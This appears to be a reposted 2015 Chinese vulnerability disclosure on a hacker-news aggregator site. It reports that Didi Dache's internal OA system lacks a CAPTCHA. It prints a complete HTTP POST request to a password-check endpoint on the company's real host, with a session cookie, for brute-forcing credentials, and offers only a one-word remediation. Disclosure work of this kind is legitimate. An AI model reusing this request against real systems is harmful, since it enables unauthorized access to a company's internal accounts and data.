记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

滴滴打车OA系统可被爆破获取内部信息

2015-08-16 11:55

无验证码,随意爆破。

 


POST /seeyon/getAjaxDataServlet?S=ajaxOrgManager&M=isOldPasswordCorrect&CL=true&RVT=XML&P_1_String=用户名&P_2_String=密码 HTTP/1.1
Host: oa.xiaojukeji.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=B5FA7EDCC4AF9262C97D8D7A6C066F2D; Hm_lvt_cee7fcb861820ecb77be09712d736e9c=1435414840,1435414892; loginPageURL="/main.do"
RA-Ver: 2.10.4
RA-Sid: 3A1781DD-20131125-104056-68df66-a3e731


 

1.jpg





返回Ture即可登陆
 

~R]N%PR9Q6HI$_8QTF[T]79.png

 

 

 

3.jpg

 

解决方案:

过滤

知识来源: www.2cto.com/Article/201508/432230.html

阅读:348810 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“滴滴打车OA系统可被爆破获取内部信息”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云